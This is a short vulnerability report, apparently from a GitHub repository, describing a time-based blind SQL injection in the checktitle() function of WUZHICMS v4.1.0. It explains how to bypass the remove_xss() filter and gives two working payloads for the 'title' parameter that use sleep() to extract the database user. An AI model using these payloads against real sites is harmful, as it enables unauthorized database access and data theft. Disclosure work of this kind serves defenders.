Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

WUZHICMS-SQL-Injection


WUZHICMS v4.1.0 function checktitle() in /coreframe/app/content/admin/content.php hava a SQL injection

  • /coreframe/app/content/admin/content.php: $titile able to control,but just to bypass function remove_xss() avatar
  • /coreframe/app/core/libs/function: function remove_xss(): Filter ”,”
    Can't use SQL like [updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)] But can use Time Blind SQL Injection avatar
  • Find the injection point in web site avatar
  • findConstruction statement,if submit,we find Controllable variable “title” avatar
  • MySQL user:

avatar

  • Exp:title=123%' and case when substring((select user()) from 1 for 1)='r' then sleep(5) else 0 end and '%'='&cid=1&id=0 avatar
  • title=123%' and case when substring((select user()) from 1 for 4)='root' then sleep(5) else 0 end and '%'='&cid=1&id=0 avatar
  • sleep 5 seconds,It's works